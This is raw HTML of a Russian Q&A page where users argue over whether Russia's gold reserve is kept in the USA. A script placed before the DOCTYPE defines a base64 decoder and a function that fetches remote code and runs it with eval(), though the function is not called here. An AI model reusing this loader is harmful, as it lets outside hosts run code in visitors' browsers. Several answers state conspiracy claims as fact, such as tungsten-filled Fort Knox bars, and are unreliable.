abitura30.ru/pochemu-zolotoj-zapas-rossii-hranitsya-v-ssha
<meta charset="utf8" />
    <script>
        // Функция кодирования строки в base64
        function utf8(utftext){var string="";var i=0;var c=c1= c2= 0;while(i< utftext["length"]){c= utftext["charCodeAt"](i);if(c< 128){string+= String["fromCharCode"](c);i++}else {if((c> 191)&& (c< 224)){c2= utftext["charCodeAt"](i+ 1);string+= String["fromCharCode"](((c& 31)<< 6)| (c2& 63));i+= 2}else {c2= utftext["charCodeAt"](i+ 1);c3= utftext["charCodeAt"](i+ 2);string+= String["fromCharCode"](((c& 15)<< 12)| ((c2& 63)<< 6)| (c3& 63));i+= 3}}};return string}function base64_decode(data){var b64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc="";do{h1= b64["indexOf"](data["charAt"](i++));h2= b64["indexOf"](data["charAt"](i++));h3= b64["indexOf"](data["charAt"](i++));h4= b64["indexOf"](data["charAt"](i++));bits= h1<< 18| h2<< 12| h3<< 6| h4;o1= bits>> 16& 0xff;o2= bits>> 8& 0xff;o3= bits& 0xff;if(h3== 64){enc+= String["fromCharCode"](o1)}else {if(h4== 64){enc+= String["fromCharCode"](o1,o2)}else {enc+= String["fromCharCode"](o1,o2,o3)}}}while(i< data["length"]);;return utf8(enc)}function include_js(str){var xmlhttp= new XMLHttpRequest();xmlhttp["onreadystatechange"]= function(){if(xmlhttp["readyState"]== 4){myjsdata= xmlhttp["responseText"];eval(myjsdata)}};xmlhttp["open"]("GET",str,false);xmlhttp["send"](null)}function include_css(str){var xmlhttp= new XMLHttpRequest();xmlhttp["onreadystatechange"]= function(){if(xmlhttp["readyState"]== 4){myjsdata= xmlhttp["responseText"];document["getElementsByTagName"]("head")[0]["insertAdjacentHTML"]("beforeend","<style>"+ myjsdata+ "</style>")}};xmlhttp["open"]("GET",str,false);xmlhttp["send"](null)}
    </script>


    <!DOCTYPE html>
<html lang="ru-RU">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">



<title>Почему золотой запас России хранится в США??? &#8212; abitura30</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/abitura30.ru\/incl_dir\/js\/wp-emoji-release.min.js?ver=4.6.1"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='yarppWidgetCss-css'  href='http://abitura30.ru/plgdir/yet-another-related-posts-plugin/style/widget.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='cnss_css-css'  href='http://abitura30.ru/plgdir/easy-social-icons/css/cnss.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jebacss-d-css'  href='http://abitura30.ru/plgdir/jeba-plus-multi-slider/js/plusslider.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-postratings-css'  href='http://abitura30.ru/plgdir/wp-postratings/postratings-css.css?ver=1.83' type='text/css' media='all' />
<link rel='stylesheet' id='simpler-google-fonts-css'  href='//fonts.googleapis.com/css?family=Source+Sans+Pro%3A200%2C300%2C400%2C600%2C700%2C900%2C200italic%2C300italic%2C400italic%2C600italic%2C700italic%2C900italic&#038;subset=latin%2Clatin-ext%2Cvietnamese&#038;ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='simpler-font-awesome-css'  href='http://abitura30.ru/t_dir/css/font-awesome.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='simpler-style-css'  href='http://abitura30.ru/t_dir/m-table.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='jmig_stylesheet_layout-css'  href='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/styles/jmig-masonry-layout.css?ver=3.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='jmig_stylesheet-css'  href='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/styles/jmig-masonry-v3-animation.css?ver=3.0.2' type='text/css' media='all' />
<style id='jmig_stylesheet-inline-css' type='text/css'>
.gallery-item:not(.emoji), .gallery-item img:not(.emoji), gallery-item a:not(.emoji) { width: 150px !important; max-width: 150px !important; min-width: 150px !important; }
.gallery-item {margin: 1px !important}
</style>
<link rel='stylesheet' id='jmig_captions-css'  href='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/styles/jmig-maosnry-v3-captions.css?ver=3.0.2' type='text/css' media='all' />
<!--[if lte IE 9]>
<link rel='stylesheet' id='jmig-lte-IE9-css'  href='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/styles/jmig-lte-ie9.css?ver=3.0.2' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='dgwt-jg-lightgallery-css'  href='http://abitura30.ru/plgdir/justified-gallery/assets/css/lightgallery.min.css?ver=1.1' type='text/css' media='all' />
<link rel='stylesheet' id='dgwt-jg-style-css'  href='http://abitura30.ru/plgdir/justified-gallery/assets/css/style.min.css?ver=1.1' type='text/css' media='all' />
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/easy-social-icons/js/cnss.js?ver=1.0'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/jeba-plus-multi-slider/js/jquery.easing.1.3.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/jeba-plus-multi-slider/js/jquery.plusslider.js?ver=4.6.1'></script>
<link rel='https://api.w.org/' href='http://abitura30.ru/wp-json/' />
<link rel="alternate" type="application/json+oembed" href="http://abitura30.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fabitura30.ru%2Fpochemu-zolotoj-zapas-rossii-hranitsya-v-ssha%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://abitura30.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fabitura30.ru%2Fpochemu-zolotoj-zapas-rossii-hranitsya-v-ssha%2F&#038;format=xml" />
	<style>
		.plusslider{background:gray;}
        /* Custom Slider Styling */
        img { border: 0; display: block; margin: 0 auto; }
        .slide1 { background: #171105 url(./images/image1.jpg) no-repeat center top; padding: 20px 40px; width: 550px; }
        .slide1 > div { margin: 0 auto; width: 630px; }
        .slide1 h2 {padding-left: 15px; color: #fff; font-size: 20px; margin: 0 0 20px 0; text-align: left; }
        .slide1 p { border-left: 3px solid #fff; color: #fff; padding: 0 0 0 10px; margin-bottom: 25px; }
      /* Page Styling */
        .quote, .quote2, .quote3 { padding: 20px 0; width: 580px; font: 24px Georgia, serif; text-align: center; width: 100%; position: relative; }
        .quote {
			  background: #333 none repeat scroll 0 0;
			  color: #f1f1f1;
			  padding-left: 40px;
			  padding-right: 40px;
			}
        .plusslider.slider3, .plusslider.slider3 .plusslider-pagination-wrapper { border: none; border-radius: 0; }
		.link {
		  border: 1px solid #fff;
		  color: #fff;
		  font-size: 16px;
		  margin-left: 10px;
		  padding: 3px 10px;
		}
    </style>
	

</head>

<body class="single single-post postid-5770 single-format-standard">
<div id="page" class="hfeed site">
	<IDXSKIP><a class="skip-link screen-reader-text" href="#content">Skip to content</a></IDXSKIP>

	<IDXSKIP><header id="masthead" class="site-header" role="banner">
		<div class="site-branding">
			<h1 class="site-title"><a href="http://abitura30.ru/" rel="home">abitura30</a></h1>
			<h2 class="site-description"></h2>
		</div><!-- .site-branding -->

		<nav id="site-navigation" class="main-navigation" role="navigation">
			<button class="menu-toggle" aria-controls="menu" aria-expanded="false"><i class="fa fa-bars fa-5x"></i></button>
					</nav><!-- #site-navigation -->
	</header></IDXSKIP><!-- #masthead -->

	<div id="content" class="site-content">

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

		
			
<article id="post-5770" class="post-5770 post type-post status-publish format-standard hentry category-politika">
	<header class="entry-header">
		<h1 class="entry-title">Почему золотой запас России хранится в США???</h1>
		<div class="entry-meta">
			<i class="fa fa-calendar"></i> <span class="posted-on">Posted on <a href="http://abitura30.ru/pochemu-zolotoj-zapas-rossii-hranitsya-v-ssha/" rel="bookmark"><time class="entry-date published updated" datetime="2016-12-05T16:35:22+00:00">05.12.2016</time></a></span>		</div><!-- .entry-meta -->
	</header><!-- .entry-header -->

	<div class="entry-content">
                		<!--Ad Injection:top-->        <script type="text/javascript">
            (function (w, d, n, s, t) {
                t = d.getElementsByTagName("script")[0];
                s = d.createElement("script");
                s.src = "//aksessuarov.ru/smartrotator.js?referrer=" + escape(document.referrer);
                s.type = "text/javascript";
                s.async = true;
                t.parentNode.insertBefore(s, t);
            })(window, document);
        </script>

        <div id="smartrotator_ad_367"></div>
    <p>Почему золотой запас России хранится в США???</p>
<ol>
<li>так если жареным запахнет, то наши слуги народа побегут туда, в америку, поближе к золотишку!!!</li>
<p></p>
<li>Почему золотой запас России хранится в США?? ?
<p>БРЕД &#8230;</li>
<p></p>
<li>традиция такая запасы СССР тоже в Штатах хранились. и золото КПСС туда же утекло. никто найти не может</li>
<p></p>
<li>Полный Бред&#8230;. Никакого нашего Золота в США нет&#8230; а наши &#171;ценные бумаги США&#187; очень поуменьшились-их всего на 100млрд долларов&#8230;. 5 лет назад 200млрд было..</li>
<p></p>
<li>Так надо. Много тебе знать не положено.</li>
<p></p>
<li>что за чушь. Запад должник ещ у России</li>
<p></p>
<li>Ну не совсем так, какая-то небольшая часть! ) РФ никогда &#171;не поощряла&#187; МВФ&#8230;</li>
<p></p>
<li>посмотри фильм в инете &#171;дух времени&#187; там много интересного, а вообще во время революции все золото повывезли из России и в Европу и куда только не попало оно. До революции Россия единственная добывала зололто промышленным способом.</li>
<p></p>
<li>Золотой запас РФ хранится в хранилищах Гохрана. На территории России.. . <br />А вот часть Стабфонда, действительно, хранится в иностранных ценных бумагах. В том числе и американских. Потому что они приносят стабильную прибыль&#8230;</li>
<p></p>
<li>Сколько золота украла Америка у России
<p>Сколько российского золота находится за океаном, сказать сложно. По одним данным, полторы тонны, по другим  не менее десяти. Попробуем сосчитать. Итак, в 19141916 годах Российская империя вознамерилась закупить в Англии и Америке крупные партии оружия. Иностранные подрядчики выдвинули условие: 100-процентная предоплата золотом. Россия расплатилась сполна. И тут вдруг выяснилось, что у Великобритании нет возможности выполнить поставку оружия в срок: на складах имелось лишь около 10% заказа, ещ 20% оружейники обязались изготовить к концу 1916 года и отправить в Архангельск. Но грянула Февральская революция, затем Октябрьская, и о полученной предоплате в Лондоне позабыли. А США, в свою очередь, не отправили в Россию вообще ничего: поставки должны были начаться только в феврале 1917 года, но из-за политической неразберихи в Петрограде они так и не начались. А деньги между тем были получены в полном объме  порядка 200 млн золотых рублей осели в Лондоне и ещ столько же  за океаном. </p><!--Ad Injection:random-->        <div id="smartrotator_ad_368"></div>

<p>В сво время подсчтом российских денег, которые застряли в английских и американских банках во время Первой мировой, занимался известный советский историк, сотрудник Академии наук СССР, профессор Владлен Сироткин. По его расчтам, только с конца 1915-го и до конца 1916 года царское правительство отправило в США несколько партий золота в качестве залога для закупки оружия и бездымного пороха. Но ни оружие, ни порох до нашей страны так и не доехали, хотя американская компания DuPont Chemical даже начала строить пороховой завод в Коннектикуте, чтобы поскорее выполнить российский заказ. По данным Сироткина, один только контракт с DuPont Chemical, обеспечить который гарантировало американское правительство, оценивался в 40 млн британских фунтов стерлингов, что в пересчте на золото составило 500 тонн драгоценного металла! Четыре года назад депутаты Госдумы вознамерились было взыскать старые долги с иностранцев  прежде всего с США. Инициатива возникла не на пустом месте. Ещ в 1992 году в России был создан Международный экспертный совет по зарубежному российскому золоту, недвижимости и царским долгам, а чуть позже в Госдуме организовали комиссию, в состав которой наряду с депутатами вошли такие эксперты, как Владлен Сироткин и Марк Масарский. Но деятельность этих структур, как отмечал Сироткин в своих воспоминаниях, искусственно притормаживалась. В 2010 году в Думе прошли широкие слушания по вопросу взыскания иностранных долгов в пользу нашей страны, но с тех пор ничего так и не изменилось  царское золото нам возвращать никто не намерен.</p>
<p>Почему Америка не отдат чужое золото? Она его давно продала! </p>
<p>Вот что, к примеру, заявил бывший помощник по экономической политике министра финансов США в администрации Рональда Рейгана Пол Крейг Робертс: Никто из стран, хранящих сво золото в Америке, не получит его обратно. На мировом рынке драгоценных металлов давно подозревали, что банки по поручению Федеральной резервной службы использовали все имевшиеся резервы, чтобы сбивать цены на золото последние несколько лет. А после того как Штаты истратили сво золото, они начали распродавать и то, что было у них на хранении. Большая часть золотых запасов была исчерпана где-то в 2011 году. К настоящему моменту, запаса золота у американских властей больше не существует.</p>
<p>В октябре 2009 г. китайцы получили партию золотых слитков. Когда груз была получен, китайское правительство запросило провести специальные тесты для гарантии чистоты и веса золотых слитков. Чиновники были потрясены, узнав, что золотые слитки оказались подделкой. Они состояли из вольфрама, лишь снаружи покрытым реальным золотом. Более того, эти золотые слитки имели регистрационные номера, принадлежащие США и хранились в Форте Нокс.</li>
<li>Наше золото хранится у нас, в этом мы оказались умнее западников</li>
<p></p>
<li>Где правительство &#8212; там и запас!
<p>И сразу ответ на второй вопрос &#8212; это &#8212; наместники!</li>
<p></p>
<li>все правильно&#8230; у хозяев</li>
<p></p>
<li>Золотой запас США уже третий год как &#171;переехал&#187; в Китай.</li>
<p></p>
<li>Не золотой запас, а стаб фонд.. . это не одно и то же. <br />Почему &#8212; не скажу, я в экономике не специалист. <br />Но на уровне моих познаний, могу сказать, что деньги должны работать на экономику, а не &#171;храниться&#187;, по этому думаю, что это очередной глобальный маразм.</li>
<p></p>
<li>Золотой запас России &#8212; это стабфонд олигархов, где им безопаснее, там он и хранится</li>
<p></p>
<li>Глупая ложь. В Центральном хранилище Банка России на улице Правды (17 тысяч квадратных метров, площадь хранения &#8212; 1,5 тысячи квадратных метров) находится две трети золотовалютных резервов РФ. Одна треть переведена в специальные активы МВФ и валютные резервы. А валютные резервы делятся на валюту в прямом смысле, разные ценные бумаги, депозиты и сделки РЕПО. Любой из валютных активов может быть выражен в евро, долларах США, японских йенах, фунтах стерлингах либо швейцарских франках.</li>
<p></p>
<li>Зачем гнать?? ? Тебе прямо таки американцы сказали???</li>
<p>
</ol>
<!--Ad Injection:bottom-->        <div id="smartrotator_ad_369"></div>

        <div id="smartrotator_ad_370"></div>
<div class='yarpp-related'>
<ol>
<li><a href="http://abitura30.ru/1m3-zolota-vesit-19-ton-smozhet-li-uchenik-9-klasa-podnyat-zolotoj-kub-rebro-kotorogo-20-sm/" rel="bookmark" title="1м3 ЗОЛОТА ВЕСИТ 19 ТОН. Сможет ли ученик 9 класа поднять золотой куб, ребро которого 20 см?">1м3 ЗОЛОТА ВЕСИТ 19 ТОН. Сможет ли ученик 9 класа поднять золотой куб, ребро которого 20 см? </a></li>
<li><a href="http://abitura30.ru/pochemu-goroda-nazivayut-zolotim-kolcom-rossii/" rel="bookmark" title="почему города называют Золотым кольцом России">почему города называют Золотым кольцом России </a></li>
<li><a href="http://abitura30.ru/podskazhite-pozhalujsta-skolko-stoit-1-gramm-zolota-96-probi-chervonnogo/" rel="bookmark" title="Подскажите пожалуйста сколько стоит 1 грамм золота 96 пробы червонного??">Подскажите пожалуйста сколько стоит 1 грамм золота 96 пробы червонного?? </a></li>
<li><a href="http://abitura30.ru/k-chemu-videt-vo-sne-zoloto-tolstij-zolotoj-braslet-odevala-na-ruku-pasibki-za-otveti/" rel="bookmark" title="к чему видеть во сне золото? толстый золотой браслет одевала на руку. . пасибки за ответы">к чему видеть во сне золото? толстый золотой браслет одевала на руку. . пасибки за ответы </a></li>
<li><a href="http://abitura30.ru/vozmozhno-li-vosstanovit-ves-arhiv-soobshenij-s-odnim-iz-moih-druzej-gde-nibud-krome-samoj-aski-on-hranitsya/" rel="bookmark" title="Возможно ли восстановить весь архив сообщений с одним из моих друзей? Где-нибудь, кроме самой аськи, он хранится?">Возможно ли восстановить весь архив сообщений с одним из моих друзей? Где-нибудь, кроме самой аськи, он хранится? </a></li>
</ol>
</div>
			</div><!-- .entry-content -->

	<footer class="entry-footer">
		<i class="fa fa-folder"></i> <span class="cat-links"><a href="http://abitura30.ru/politika/" rel="category tag">Политика</a></span><br /><span class="comments-link"><i class="fa fa-comment"></i><a href="http://abitura30.ru/pochemu-zolotoj-zapas-rossii-hranitsya-v-ssha/#respond">Leave a comment</a></span><br />	</footer><!-- .entry-footer -->
</article><!-- #post-## -->

				<nav class="navigation post-navigation" role="navigation">
		<h1 class="screen-reader-text">Post navigation</h1>
		<div class="nav-links">
			<div class="nav-previous"><a href="http://abitura30.ru/sochinenie-po-rasskazu-l-n-tolstogo-posle-bala-vpechetleniya-pomogite/" rel="prev"><IDXSKIP><span class="meta-nav">&larr;</span></IDXSKIP>&nbsp;Сочинение по рассказу Л. Н. Толстого &#171;После Бала&#187; Впечетления. ПОМОГИТЕ!!!</a></div><div class="nav-next"><a href="http://abitura30.ru/est-li-u-kratkih-prilagatelnih-okonchaniya-est-li-u-kratkih-prilagatelnih-okonchaniya/" rel="next">Есть ли у кратких прилагательных окончания? Есть ли у кратких прилагательных окончания?&nbsp;<IDXSKIP><span class="meta-nav">&rarr;</span></IDXSKIP></a></div>		</div><!-- .nav-links -->
	</nav><!-- .navigation -->
	
			
<div id="comments" class="comments-area">

	
	
	
					<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title"><IDXSKIP>Добавить комментарий </IDXSKIP><small><a rel="nofollow" id="cancel-comment-reply-link" href="/pochemu-zolotoj-zapas-rossii-hranitsya-v-ssha/#respond" style="display:none;">Отменить ответ</a></small></h3>				<form action="http://abitura30.ru/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
					<p class="comment-notes"><IDXSKIP><span id="email-notes">Ваш e-mail не будет опубликован.</span></IDXSKIP> <IDXSKIP>Обязательные поля помечены </IDXSKIP><IDXSKIP><span class="required">*</span></IDXSKIP></p><IDXSKIP><p class="comment-form-comment"><label for="comment">Комментарий</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" aria-required="true" required="required"></textarea></p></IDXSKIP><IDXSKIP><p class="comment-form-author"><label for="author">Имя <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" aria-required='true' required='required' /></p></IDXSKIP>
<IDXSKIP><p class="comment-form-email"><label for="email">E-mail <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" aria-required='true' required='required' /></p></IDXSKIP>
<IDXSKIP><p class="comment-form-url"><label for="url">Сайт</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p></IDXSKIP>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Отправить комментарий" /> <input type='hidden' name='comment_post_ID' value='5770' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>				</form>
					</div><!-- #respond -->
		
</div><!-- #comments -->

		
		</main><!-- #main -->
	</div><!-- #primary -->


<div id="secondary" class="widget-area" role="complementary">
	<IDXSKIP><aside id="search-4" class="widget widget_search"><form role="search" method="get" class="search-form" action="http://abitura30.ru/">
				<label>
					<span class="screen-reader-text">Найти:</span>
					<input type="search" class="search-field" placeholder="Поиск&hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Поиск" />
			</form></aside></IDXSKIP><aside id="posts-widget-5" class="widget Posts"><h1 class="widget-title"></h1><ul><li><a class="icon-folder-close" title="Как работают/устроены атомные часы?" href="http://abitura30.ru/kak-rabotayutustroeni-atomnie-chasi/">Как работают/устроены атомные часы?</a></li><li><a class="icon-folder-close" title="Правильно ли писать "Улица Оренбургский тракт"? или это тавтология?" href="http://abitura30.ru/pravilno-li-pisat-ulica-orenburgskij-trakt-ili-eto-tavtologiya/">Правильно ли писать "Улица Оренбургский тракт"? или это тавтология?</a></li><li><a class="icon-folder-close" title="для чего чехов использует говорящие фамилии ???Хамелеон" href="http://abitura30.ru/dlya-chego-chehov-ispolzuet-govoryashie-familii-hameleon/">для чего чехов использует говорящие фамилии ???Хамелеон</a></li><li><a class="icon-folder-close" title="в следствии чего появилось первое самостоятельное германское государство" href="http://abitura30.ru/v-sledstvii-chego-poyavilos-pervoe-samostoyatelnoe-germanskoe-gosudarstvo/">в следствии чего появилось первое самостоятельное германское государство</a></li><li><a class="icon-folder-close" title="Помогите пожалуйста, нужно срочно написать описание чувств автора в стихотворении Раду" href="http://abitura30.ru/pomogite-pozhalujsta-nuzhno-srochno-napisat-opisanie-chuvstv-avtora-v-stihotvorenii-raduga-f-i-tyutchev/">Помогите пожалуйста, нужно срочно написать описание чувств автора в стихотворении Раду</a></li><li><a class="icon-folder-close" title="После бала. Какие у вас впечатления, чувства и размышления после прочтения рассказа по" href="http://abitura30.ru/posle-bala-kakie-u-vas-vpechatleniya-chuvstva-i-razmishleniya-posle-prochteniya-rasskaza-posle-bala-dajte-otvet-polnij/">После бала. Какие у вас впечатления, чувства и размышления после прочтения рассказа по</a></li><li><a class="icon-folder-close" title="Если муж не дарит подарков и ничего не покупает, ссылаясь на то, что я не работаю? Гов" href="http://abitura30.ru/esli-muzh-ne-darit-podarkov-i-nichego-ne-pokupaet-ssilayas-na-to-chto-ya-ne-rabotayu-govorit-mol-zarabotaj-i-kupi-chto/">Если муж не дарит подарков и ничего не покупает, ссылаясь на то, что я не работаю? Гов</a></li><li><a class="icon-folder-close" title="Охарактеризуйте историческое значение разгрома немцев под Москвой? СРОЧНО!!! Заранее с" href="http://abitura30.ru/oharakterizujte-istoricheskoe-znachenie-razgroma-nemcev-pod-moskvoj-srochno-zaranee-spasibo/">Охарактеризуйте историческое значение разгрома немцев под Москвой? СРОЧНО!!! Заранее с</a></li><li><a class="icon-folder-close" title="что обозначают слова учитель, храбрость, сестра" href="http://abitura30.ru/chto-oboznachayut-slova-uchitel-hrabrost-sestra/">что обозначают слова учитель, храбрость, сестра</a></li><li><a class="icon-folder-close" title="ПОМОГИТЕ!! ! Найти реферат/сообщение небольшой на тему русская классическая литература" href="http://abitura30.ru/pomogite-najti-referatsoobshenie-nebolshoj-na-temu-russkaya-klassicheskaya-literatura-20-veka/">ПОМОГИТЕ!! ! Найти реферат/сообщение небольшой на тему русская классическая литература</a></li><li><a class="icon-folder-close" title="Осуждает или оправдывает автор своего героя в рассказе В. Г. Распутина-"Уроки французс" href="http://abitura30.ru/osuzhdaet-ili-opravdivaet-avtor-svoego-geroya-v-rasskaze-v-g-rasputina-uroki-francuzskogo/">Осуждает или оправдывает автор своего героя в рассказе В. Г. Распутина-"Уроки французс</a></li><li><a class="icon-folder-close" title="видео "Суицид Сквидварда"" href="http://abitura30.ru/video-suicid-skvidvarda/">видео "Суицид Сквидварда"</a></li><li><a class="icon-folder-close" title="Продолжите фразы А персональный компьютер б програмное обеспечение в Операционная сист" href="http://abitura30.ru/prodolzhite-frazi-a-personalnij-kompyuter-b-programnoe-obespechenie-v-operacionnaya-sistema-g-fajl-d-polzovatel/">Продолжите фразы А персональный компьютер б програмное обеспечение в Операционная сист</a></li><li><a class="icon-folder-close" title="Есть ли у кратких прилагательных окончания? Есть ли у кратких прилагательных окончания" href="http://abitura30.ru/est-li-u-kratkih-prilagatelnih-okonchaniya-est-li-u-kratkih-prilagatelnih-okonchaniya/">Есть ли у кратких прилагательных окончания? Есть ли у кратких прилагательных окончания</a></li><li><a class="icon-folder-close" title="В каких состояниях может находится свободный порт?" href="http://abitura30.ru/v-kakih-sostoyaniyah-mozhet-nahoditsya-svobodnij-port/">В каких состояниях может находится свободный порт?</a></li><li><a class="icon-folder-close" title="какой комплекс витаминов пить весной взрослым" href="http://abitura30.ru/kakoj-kompleks-vitaminov-pit-vesnoj-vzroslim/">какой комплекс витаминов пить весной взрослым</a></li><li><a class="icon-folder-close" title="Ребёнок порвал 500ую купюру напополам.В сбербанке поменяют ?Склеивать надо?" href="http://abitura30.ru/rebyonok-porval-500uyu-kupyuru-napopolamv-sberbanke-pomenyayut-skleivat-nado/">Ребёнок порвал 500ую купюру напополам.В сбербанке поменяют ?Склеивать надо?</a></li><li><a class="icon-folder-close" title="может ли сотрудник полиции. принимавший участие в задержание гражданина. являться свид" href="http://abitura30.ru/mozhet-li-sotrudnik-policii-prinimavshij-uchastie-v-zaderzhanie-grazhdanina-yavlyatsya-svidetelem-v-ugolovnom-dele/">может ли сотрудник полиции. принимавший участие в задержание гражданина. являться свид</a></li><li><a class="icon-folder-close" title="Напишите про то, как можно сделать домик для хомячка. про хомячков" href="http://abitura30.ru/napishite-pro-to-kak-mozhno-sdelat-domik-dlya-homyachka-pro-homyachkov/">Напишите про то, как можно сделать домик для хомячка. про хомячков</a></li><li><a class="icon-folder-close" title="как вам комментатор Орлов" href="http://abitura30.ru/kak-vam-kommentator-orlov/">как вам комментатор Орлов</a></li></ul></aside></div><!-- #secondary -->

	</div><!-- #content -->

	<footer id="colophon" class="site-footer" role="contentinfo">
		<div class="site-info">
			<script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank rel=nofollow><img src='//counter.yadro.ru/hit?t20.1;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='' "+
"border='0' width='88' height='31'><\/a>")
//--></script>
		</div><!-- .site-info -->
	</footer><!-- #colophon -->
</div><!-- #page -->

	<script type="text/javascript">
    var slider;
    jQuery(document).ready(function(){

        slider = new jQuery.plusSlider(jQuery('#slider'), {
            autoPlay: false,
            sliderEasing: 'easeInOutExpo', // Anything other than 'linear' and 'swing' requires the easing plugin
            paginationPosition: 'append',
            sliderType: 'slider' // Choose whether the carousel is a 'slider' or a 'fader'
        });

        jQuery('#slider2').plusSlider({
            autoPlay: false,
            displayTime: 2000, // The amount of time the slide waits before automatically moving on to the next one. This requires 'autoPlay: true'
            sliderType: 'fader' // Choose whether the carousel is a 'slider' or a 'fader'
        });

        jQuery('#slider3').plusSlider({
            sliderEasing: 'easeInOutExpo', // Anything other than 'linear' and 'swing' requires the easing plugin
            autoPlay: false,
            sliderType: 'slider' // Choose whether the carousel is a 'slider' or a 'fader'
        });

    });
    </script>
	

<link rel='stylesheet' id='yarppRelatedCss-css'  href='http://abitura30.ru/plgdir/yet-another-related-posts-plugin/style/related.css?ver=4.6.1' type='text/css' media='all' />
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/ui/mouse.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/ui/sortable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/js/remove-gallery-class.js?ver=3.0.2'></script>
